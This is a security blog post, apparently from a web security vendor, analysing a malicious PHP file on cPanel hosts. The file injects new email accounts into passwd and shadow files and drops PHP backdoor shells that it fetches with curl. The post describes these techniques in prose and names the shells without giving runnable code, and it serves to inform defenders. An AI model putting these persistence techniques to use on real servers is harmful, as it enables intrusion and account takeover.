Reset Email Account Passwords after Website Infection: Follow Up

Reset email account passwords after website infection

In a previous analysis of a malicious file, we demonstrated why you should always update your email account passwords after a security compromise.

The information security threat landscape is always changing. Likewise, the tools used by bad actors are also evolving to evade detection by IDS/IPS and other similar services.

cPanel Hosting Environment File Analysis

In our past post, we analyzed a file that modified passwords to existing email accounts within /home/user/etc/shadow. In cPanel hosting environments, this file manages email addresses for a specific cPanel username.

But what if a hacker wishes to add new email accounts instead of just modifying existing email account passwords?

This new scenario requires the attacker to modify /home/user/etc/shadow as well as the /home/user/etc/passwd file. These files store additional information on a users’ email accounts.

Email Accounts & Variables Injected into Shadow Files

A recent variation shows the hacker using variables and specified static email account usernames along with their associated directories and passwords.

Injected Emails in Shadow Files
infos@domain.com and hussam@domain.com are just some of the new email accounts injected into the/home/user/etc/domain.com/passwd and /home/user/etc/domain.com/shadow files
Injected variables in passwd and shadow files
The data from both the $hm and $wr variables injected into the respective passwd and shadow files. This is basically a form of manual email account creation rather than the traditional cPanel interface.

PHP Backdoor Shell Dropper

Some of the other “improvements” made to the malicious file includes the generation of multiple PHP backdoor shells in the website’s document root. This file also sends out information (at the attacker’s discretion) regarding any newly created email addresses.

PHP backdoor shells in document root

Interestingly enough, the hacker uploads three different PHP shells (wso, mini, and idbv2) and uses the PHP curl function to pull the output of a HTTP request. Then they inject the received output into one of the predefined files (e.g include.php, kontol.php) using the fwrite function.

fwrite function and curl request for php backdoor

From the file’s coding, it looks like whoever created this malicious file simply added some new features to the existing code sample analyzed in our last post. Even the variable names remain the same ⁠— only the password changes.

Conclusion

Our server-side scanning and cleanup tools immediately identified this file’s malicious nature. In addition, the code “improvements” did nothing to help it evade our detection.

It is always important to reset every password associated with your hosting environment after a website compromise. Access controls for your domain, FTP, SFTP, cPanel, Plesk, CMS dashboards, and databases should be modified with new, secure passwords to mitigate website reinfection.

You May Also Like